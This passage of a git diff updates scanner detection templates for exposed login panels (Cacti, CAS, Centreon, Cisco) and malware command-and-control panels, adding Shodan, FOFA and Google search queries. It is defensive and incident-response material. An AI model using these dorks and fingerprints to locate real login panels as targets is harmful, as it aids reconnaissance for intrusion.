newline at end of file +# digest: 4a0a0047304502201a3829f74293f6124d98ee4ad6dd20c93d7db14d5f94b27d676c176596aff0d5022100ba9db4fbc6059526b522c2393eb25e1bea8bf8c17e316611cfd5e8c7e3d0f76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml index 3a591b9c05..c296e0a91b 100644 --- a/http/exposed-panels/c2/hack5-cloud-c2.yaml +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://twitter.com/fofabot/status/1742737671037091854 metadata: - fofa-query: app="Hak5-C2" - max-request: 1 verified: true + max-request: 1 + fofa-query: app="Hak5-C2" tags: c2,ir,osint,hack5c2,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022023d3630d9d342f93264fc99afdd5678dea442db11cc19985526791f1e77f41ec0220628ae099dd06959f4e6df500639870f72e1de3db53ef1b9d08b62f72fe357a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e12af4b6dc0aacc6d562825fd0ec6991edf6fb7c43af24aef3513e11c8702f54022052e9442dea4dbc7dc803ef5e8e6d2328e31df8f11277db7d0571b3da76ff8522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index b5859c0e76..4ff1d0b85d 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -7,9 +7,9 @@ info: description: | Hookbot panel were detected. metadata: + verified: true max-request: 1 shodan-query: title:"hookbot" - verified: true tags: tech,rat,hookbot,c2,panel,detect http: @@ -21,4 +21,4 @@ http: - type: dsl dsl: - "status_code == 200 && contains(body, 'HOOKBOT PANEL')" -# digest: 4a0a0047304502203e86af1fb29c1715c97a32465f34376122be2577244cced96954af6edabc4882022100ee3cae8088ba6cffea93389f69192b70a7e712960b1a217a555941b8fe806b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c04a762363c8d88423e79a4eb341e437ba2610d84079ebd08526f7f1ec4c328e02203e6aa70fb4ac581b98ebbfe3b9e260e64d95b7a61770ef43f37ab24934a87533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/meduza-stealer.yaml b/http/exposed-panels/c2/meduza-stealer.yaml index d0656a3536..17e43cd56d 100644 --- a/http/exposed-panels/c2/meduza-stealer.yaml +++ b/http/exposed-panels/c2/meduza-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Meduza Stealer panel were detected. metadata: + verified: "true" max-request: 1 shodan-query: http.title:"Meduza Stealer" - verified: "true" tags: rat,meduza-stealer,c2,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201857c90bb4873d74e64cdd0d581741a34b5ab85e305a1859784ee605c3badde6022100b2e004b0c7a1761427d06cd37b47dc320a2cb4626e027d5c9fb1ed9a032a7157:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f565fe970d4e382742391146251c9f2d24d729a092491615ccd5f22aef0d25302205f0b77e8b93047651343b010637f09b1c5e4b7542f74b28d5c0f081bb9473be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index cb4971803b..e3d1fda801 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Mystic Stealer panel were detected. metadata: + verified: "true" max-request: 1 shodan-query: http.title:"Mystic Stealer" - verified: "true" tags: tech,rat,mystic-stealer,c2,panel http: @@ -23,4 +23,4 @@ http: dsl: - "status_code == 200 && contains(body, 'Mystic Stealer')" condition: and -# digest: 4b0a004830460221009db30abfeb0ff686a7c28a4f176d17f1ef592748be4fd65a61ecc98bf88cb2a6022100d22a311a14764af1763bd5a9aad21c20cdf9dc3c143fac6b6756c6e0c9f9f60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039484c0b93373e5e7308fd8d7d380d80ab626686b05818703deb40617c9229cb022100b060b57fffc5fab831abc43fb46b7f27bbca912c3af94ead20d8acf04fe420f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 6c80b2a5fb..660f911556 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -10,9 +10,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: + verified: true max-request: 1 shodan-query: ssl:Mythic port:7443 - verified: true tags: c2,ir,osint,mythic,panel http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6d5765201b97e132cd0677063e317267a751e67632712b285e240c66433f4be02207480243445c64e44010d2894574344cebd20434e132ebb8fd910758534594cb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6c217bc8ec396d9eb6264fd6f032ec80d12dcc46661821ec31f90291372e24e02203dcafda17da29630c99778d413868600dfdbe62b811f619a909d63cd159ed3e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index 4dc4466b6a..82226f9096 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1616179246216396806 metadata: - censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 - max-request: 1 verified: "true" + max-request: 1 + censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 tags: tech,nh,c2,panel http: @@ -24,4 +24,4 @@ http: - "status_code == 301 && status_code == 302" - "(\"03609e8e4a0a0ef888327d64ae2dc8950664219e\" == sha1(body))" condition: and -# digest: 490a00463044022063ab516462741e34434d9a9c199377f80e51f522197cb6175504b98fb36141ff02207115b32c0520afbef3c6ed48d4e3e67fc99ad28aa45a8bab9df3384082e67fe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a8064b8e5be6cc4ab5ab8543d53233b4fd857fd72040f9dcc7ce30fc75ba616022100c5470a7a707119ac0cd4eda84e10c1fd1c8285f170af01feca029507df7eaa9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml index 694db8c8f7..61ef9b3d52 100644 --- a/http/exposed-panels/c2/pupyc2.yaml +++ b/http/exposed-panels/c2/pupyc2.yaml @@ -10,9 +10,9 @@ info: - https://twitter.com/TLP_R3D/status/1654038602282565632 - https://github.com/n1nj4sec/pupy metadata: + verified: true max-request: 1 shodan-query: aa3939fc357723135870d5036b12a67097b03309 - verified: true tags: c2,ir,osint,pupyc2,panel http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022057d29d7d97cb13a9a35b89dfe318ef030a1df69dbfd1e8a21132fcc0e64b69e2022100bb254b2c1afde50e7e251ed8126e89f75d49eb9b91445812280bf608165ce082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060e2ba527414009da71d2b5d61b6e4ee695565b87fd1efbd0e19cb203a065986022014f66b0d9025e1ccfe5347ee0a05eea5c15dbda38766f01d394249078a4c73a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 02959fa844..101c68a828 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -8,8 +8,8 @@ info: - https://twitter.com/0xperator/status/1677873700610162690 - https://github.com/alex14324/Rhadamanthys-Stealer metadata: - max-request: 1 verified: true + max-request: 1 tags: c2,rhadamanthys,stealer,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008232f0584107ae1208f1df5e74e599ae1b886c4b700ee62ab850b0b0e929b705022100b3ae8d19dc7d1f170d92c55ad3891d4f79c2c913851eef6d95e7c4d52aaa34ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a665aa354aecaa73bbd5ab244a2d2d4ee6e5bdc18e0daba66e1849533b026ced022100b9c459a8d5e1ffd54560c584b6f5c8ecc64fd3c3d8cf5360e60284d04bdeb186:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml index 0de7bff39c..ac6c9ad529 100644 --- a/http/exposed-panels/c2/supershell-c2.yaml +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -10,9 +10,9 @@ info: - https://twitter.com/S4nsLimit3/status/1693619836339859497 - https://github.com/tdragon6/Supershell/blob/main/README_EN.md metadata: - fofa-query: icon_hash="-1010228102" - max-request: 1 verified: true + max-request: 1 + fofa-query: icon_hash="-1010228102" tags: c2,ir,osint,supershell,panel http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091de6113e88b1dac039795b04c1f74947aa27064d8d904ce5d2937331374af5f02207cb591a3025a268582238d89c37bc1d84dd912fb05d35e71d9480d7a3cc9fd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9c0fcd9b24b3a263acb78969fe716aa9da0312cb70c5509eb5b79fc10662e50022100ed849496590862afaa9f8a0cfa29f3ed1b621f1430688cba705289b5931d8dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index 88ce93aee0..58b8ae9ef9 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -9,10 +9,10 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1635724410274414596 metadata: - censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 + verified: "true" max-request: 1 shodan-query: http.html_hash:1015055567 - verified: "true" + censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 tags: tech,viper,c2,malware,ir,panel http: @@ -27,4 +27,4 @@ http: - "status_code == 404" - "(\"057f3b5488605b4d224d038e340866e2cdfed4a3\" == sha1(body))" condition: and -# digest: 4a0a00473045022100d611d7a526bfb1c041ade83ada99949e2306854350ec715f40beba72ec98b6b10220406bc07f5bb48c3398fe534d989b2ab250b58eddc9592bb4933702801b491073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054c3cee28570a6e92f667c29d2b76b51ff8a871e8201136d0ef7767fba4949e502207fc7b93b94a621b5a4bd5b34fa4025a0591f8c4012740b45a0465e8e0f501bc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index e998a1a95e..c235b60b58 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -14,10 +14,20 @@ info: metadata: verified: true max-request: 2 - product: cacti vendor: cacti - shodan-query: http.favicon.hash:-1797138069 - fofa-query: icon_hash="-1797138069" + product: cacti + shodan-query: + - http.favicon.hash:-1797138069 + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"login to cacti" + - intitle:"cacti" tags: cacti,login,panel,detect http: @@ -48,4 +58,4 @@ http: group: 1 regex: - "<div class='versionInfo'>Version (.*) |" -# digest: 4a0a00473045022100b3110f2d77b3f6513cc8f7e915660505f5f1414f89715d1fc1a562bde90075fa02201dcff79552b3f5d1622fc45bda5868f3a4b43b6bc5edf01210dc46a04630f1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207fecb5e7c1e7984c7e501984ec58102f09cbff040b480c8fec107df85b5e610d022006f787084598d9136915bb6a88b0f6134ea9463b263346b4586300520a870367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cas-login.yaml b/http/exposed-panels/cas-login.yaml index 69deb8264c..466f87eb50 100644 --- a/http/exposed-panels/cas-login.yaml +++ b/http/exposed-panels/cas-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: - github: https://github.com/apereo/cas max-request: 1 - product: central_authentication_service - shodan-query: http.title:'CAS - Central Authentication Service' vendor: apereo + product: central_authentication_service + shodan-query: + - http.title:'CAS - Central Authentication Service' + - http.title:'cas - central authentication service' + github: https://github.com/apereo/cas + fofa-query: title='cas - central authentication service' + google-query: intitle:'cas - central authentication service' tags: apereo,cas,panel,login http: @@ -28,4 +32,4 @@ http: - type: word words: - 'Central Authentication Service' -# digest: 490a00463044022071e6304b70fbfc04d0475ccc3c7afb5e7187ec3e6c88b8b91bd1789e76ea082402201a862c543154732f3ef39d434ba812008f027a1b6e63ffe548733a18da838acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b754aa73faa7a8eb943e00275bc395117108304a4acf536d967a89364352e8e022100f8aaa07e8860e7fa04b4cd07cabe47f039a03eca1459d2a7acf1309b8e3be3e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/casaos-panel.yaml b/http/exposed-panels/casaos-panel.yaml index 60d8bec6a2..692ddac51e 100644 --- a/http/exposed-panels/casaos-panel.yaml +++ b/http/exposed-panels/casaos-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"CasaOS" - verified: true tags: panel,casaos,login,detect http: @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058935ba694b70a8f74d99a1b4c984faae5edb522532b19bc4a7a69e41c8fc16f022100f0cd7fb9e9a5fb38a4fec5656cd650dc1fc28e3945e61c42e9efce72c91f88be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f0cf4e8c38e949e072718beb3416c8dd350c8175d045a024c8971e7c74141ab022038106666f0eb4962180327b98faa88b99b8128192108ec41d7ac86b5a62a34d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/casdoor-login.yaml b/http/exposed-panels/casdoor-login.yaml index a425aef2af..0b492bcba6 100644 --- a/http/exposed-panels/casdoor-login.yaml +++ b/http/exposed-panels/casdoor-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: casdoor - shodan-query: http.title:"Casdoor" vendor: casbin + product: casdoor + shodan-query: + - http.title:"Casdoor" + - http.title:"casdoor" + fofa-query: title="casdoor" + google-query: intitle:"casdoor" tags: panel,casdoor,casbin http: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220316022fd744519e112b4d069cf87e3d538d1e90049cf9bb12c29e39fa9e20c53022052f0186966dc197f9d2a5ff7d2d003db012151a3ed523747f863d2baba75104f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077f20a4965393e8d70db40243c0063f6b6c5cab5ffc91a4e2c0ef463db827cdd022048e1cf28506b77aca8466529939370bbf7464f93ec72d34f529e443a43741e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/casemanager-panel.yaml b/http/exposed-panels/casemanager-panel.yaml index a86d060782..7712f0e919 100644 --- a/http/exposed-panels/casemanager-panel.yaml +++ b/http/exposed-panels/casemanager-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="CaseManager" max-request: 1 + fofa-query: title="CaseManager" tags: casemanager,panel http: @@ -27,4 +27,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008447814425311e3a8a6362ed6be13f0bbb83b1e9fb7bb6e77b6d19b841ae8e2202210092e4a35f8947d75f884dcff402b9bb9c480035d2e1acf044645fb1a9d58e35ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205250da024100bb00e1f61e94c81598cecc8a54d98281ea88f4ba1b41e8cd46190221008d44875afa8a9c24efd02c71fdc557f9f2d3658a05914b3270d96874cf6fff51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/caton-network-manager-system.yaml b/http/exposed-panels/caton-network-manager-system.yaml index 5ea1913c64..5d13fbf21c 100644 --- a/http/exposed-panels/caton-network-manager-system.yaml +++ b/http/exposed-panels/caton-network-manager-system.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Caton Network Manager System" - verified: true tags: caton,manager,login,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202595b63dc1084511885407d1974656b953d2fb97a03210ed0dec6d0dddc083a7022100b173a74eeed99b9af8931be9e1090fb9fde0e2dcb49ab83a73c177cc9d15e640:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af33cedf76bde6d1a620e73de647fab03f462e4f9cd9e355c5fd830130806193022077e0226f5f77bddf0c7b58ac3a708dcf44ecefc3fac2a2f969e261f145f112c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ccm-detect.yaml b/http/exposed-panels/ccm-detect.yaml index 9244e1dd55..2ea0ec207a 100644 --- a/http/exposed-panels/ccm-detect.yaml +++ b/http/exposed-panels/ccm-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"CCM - Authentication Failure" - verified: true tags: panel,clearcom,ccm http: @@ -31,4 +31,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022033cce126fb6fa470ae9d526d69571dffadc9262a58ba1e555c7a0397657bfcb50221008971333263854d2cd0f3ec2647ea8cf44e417e37322c5a859f17da893149b653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d8054cfaf5ee7ca5eed10465a8a1e23f85ce78fdece58504e9be1e9e781c68b0221008730938e41a01c427ee3351f0da71e0354f1c0cc53f35f1c2f5ad2484f0b955a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/centreon-panel.yaml b/http/exposed-panels/centreon-panel.yaml index 58f87a48a1..7af011bd09 100644 --- a/http/exposed-panels/centreon-panel.yaml +++ b/http/exposed-panels/centreon-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: centreon_web - shodan-query: http.title:"Centreon" vendor: centreon + product: centreon_web + shodan-query: + - http.title:"Centreon" + - http.title:"centreon" + fofa-query: title="centreon" + google-query: intitle:"centreon" tags: panel,centreon,login http: @@ -40,4 +44,4 @@ http: group: 1 regex: - 'v. (.*)' -# digest: 4a0a00473045022100e54e060d59c1e789e7ecc1e0f642623e61c78ffcee6d2efc7deb7f1ffa3ff4ce02200e6f5ab71a0032b17c4e3ddf4fa1ab0ac9971a90138b6b2f8dfd5c98f8acb732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206afdc426a5872acc234d3a98803e7e68b5e249cfbfe126d64424367efb8613dc02210087789f4ac125c088781ec8c6c2be8d97f7c3b65de0e25aba0cde138d7bc52fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml index 9d1bbc86a7..7d1b8be579 100644 --- a/http/exposed-panels/changedetection-panel.yaml +++ b/http/exposed-panels/changedetection-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/dgtlmoon/changedetection.io - https://changedetection.io/ metadata: + verified: true max-request: 1 shodan-query: title:"Change Detection" - verified: true tags: panel,changedetection,detect http: @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e3b7e37f469df077d15f2702fa2cdd703513432c774b1ac5e6612003e31f53a70220701c4b635c29aa92a5596d32b42dd587eb32603d7cf7fbad99657cd4da4633a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index b423ced58d..4cfea266bb 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:tribe29:checkmk:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: checkmk vendor: tribe29 + product: checkmk tags: login,tech,synology,rackstation,panel,tribe29 http: @@ -39,4 +39,4 @@ http: regex: - '<div id="version">([0-9.a-z]+)<\/div>' - '<div id="foot">Version: ([0-9.a-z]+)' -# digest: 4a0a00473045022100c05097a066ea3ac7388836e614a90ffedf62317936eb547238190ff82cfd3eb002204baefd146e350a8551aa70d283be7f7aadb163d0a2638cc443aff536d8327293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b310dc2eb2c1633e9d63b74c63df7b1dfee65e41b00f931d7ba59a93b5655910022100dc129226cfb39444cfd03083edd885b212c317aedc94300267e185c5b25d6290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/checkpoint/ssl-network-extender.yaml b/http/exposed-panels/checkpoint/ssl-network-extender.yaml index 336df52378..624aa5cfd7 100644 --- a/http/exposed-panels/checkpoint/ssl-network-extender.yaml +++ b/http/exposed-panels/checkpoint/ssl-network-extender.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:checkpoint:ssl_network_extender:*:*:*:*:-:*:*:* metadata: - google-query: intitle:"SSL Network Extender Login" max-request: 1 - product: ssl_network_extender - shodan-query: http.title:"Check Point SSL Network Extender" vendor: checkpoint + product: ssl_network_extender + shodan-query: + - http.title:"Check Point SSL Network Extender" + - http.title:"check point ssl network extender" + - http.title:"ssl network extender login" + google-query: + - intitle:"SSL Network Extender Login" + - intitle:"ssl network extender login" + - intitle:"check point ssl network extender" + fofa-query: + - title="check point ssl network extender" + - title="ssl network extender login" tags: panel,checkpoint,router http: @@ -35,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203df8b22d7fb2b37146faed807588a9f3c151a69e5c74042865bde82f9804290002207a05e05c6b45a7ae956c66f15b115d4194577d923597f25d5ed32464ba31d62b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008677cdbcb2c06d24e27b2c06817b1f6bc93db007b4c2ae14ce701a95265c166202203bae0c51bd45bbb7a6dc4231ba2f9b5c6bb71b2e3325e8941119cddc142f5e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/chronos-panel.yaml b/http/exposed-panels/chronos-panel.yaml index fdb20d8a8d..1f59e60ef1 100644 --- a/http/exposed-panels/chronos-panel.yaml +++ b/http/exposed-panels/chronos-panel.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.asys.fr/chronos metadata: - fofa-query: body="chronoslogin.js" + verified: true max-request: 1 shodan-query: http.html:"chronoslogin.js" - verified: true + fofa-query: body="chronoslogin.js" tags: panel,chronos,login,detect http: @@ -41,4 +41,4 @@ http: group: 1 regex: - '(?i)chronos\s+([0-9.-]+)' -# digest: 4a0a00473045022100f7620b7259aaecbbd6061354c2be0f96b724f8beb5fba454f32d0b229b1b84ad02202afbe0574ebd3569667fcfaae9234367d35c2e706bca838bfd5703fb5096956e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009f7438da9d01090973ae8536e098964867b8691a578fe89fb6613124a89f114022100c3107046e922d9da17b81e71a7de12a2eb23c2f6370713c4ea47bc9313a125b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml new file mode 100644 index 0000000000..0ebfef6196 --- /dev/null +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -0,0 +1,42 @@ +id: cisco-firepower-panel + +info: + name: Cisco Firepower Management Center login - Detect + author: Charles D + severity: info + description: | + Cisco Firepower Management Centerlogin panel was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: html:"cisco firepower management" + tags: login,cisco,panel,console + +http: + - method: GET + path: + - '{{BaseURL}}/ui/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Firepower Management Center" + - "Login" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" +# digest: 490a004630440220038221cfd474cf96d18842a52bc6445ca4041ed6a80333506d054dcf3bbe5fd8022025d4d69faa51eb24fb92855e6eaec6c403d09a2885b63324206c271d800d703a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml index e109b0e066..e56bc08180 100644 --- a/http/exposed-panels/cisco-unity-panel.yaml +++ b/http/exposed-panels/cisco-unity-panel.yaml @@ -7,9 +7,9 @@ info: description: | A Cisco Unity Connection instance was detected. metadata: + verified: true max-request: 2 shodan-query: html:"Cisco Unity Connection" - verified: true tags: panel,cisco,unity,login,detect http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067ca0395c5118f81dca1fb693524759e613d662a69a2460743b6d6e403ba551802206cc24a8eb5dd2c5b8e3a429129800013dbc0e6a82d95180966478212fba5c6af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml index 0d3f6df1d7..26dc715a24 100644 --- a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml +++ b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:anyconnect_secure_mobility_client:*:*:*:*:windows:*:*:* metadata: max-request: 1 - product: anyconnect_secure_mobility_client vendor: cisco + product: anyconnect_secure_mobility_client tags: cisco,panel,vpn http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100debdf18d610809bfcc415f9da481b40e52a2cc7a359b3c437a52772fe258f2cb02210086b989391c0cf2682aae6d6fdffb2e85c09966944250a3c5ca4c32bdec8be0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009917c0358df31375f02f7c551bac45eb9be985bc2cf03787fe7f5bb32ffdd9c202205e850a19b48d44e3ba3bca147036e04efec49c87db97b77833b0a81c0458484d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-asa-panel.yaml b/http/exposed-panels/cisco/cisco-asa-panel.yaml index 549f7107cc..939c80acda 100644 --- a/http/exposed-panels/cisco/cisco-asa-panel.yaml +++ b/http/exposed-panels/cisco/cisco-asa-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: adaptive_security_appliance_software vendor: cisco + product: adaptive_security_appliance_software tags: cisco,panel http: @@ -29,4 +29,4 @@ http: - "/+CSCOU+/portal.css" - "SSL VPN Service" condition: or -# digest: 4a0a0047304502203e82a198cf6173511c2a289a850a43eed0b3113376aeee2bf54d72f1c005b8dc022100f0e36a800baed2f6e7dd642af2a1c4ac55178dcb405cd925d13dde8eea621676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4dc07548054223c2c69d33933c27302357ffc49c775dd180fcf07f8f9b1cb2f022002df46873ec98e3b00f999ad2f396ad29783a946141120d513646cb54426e8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 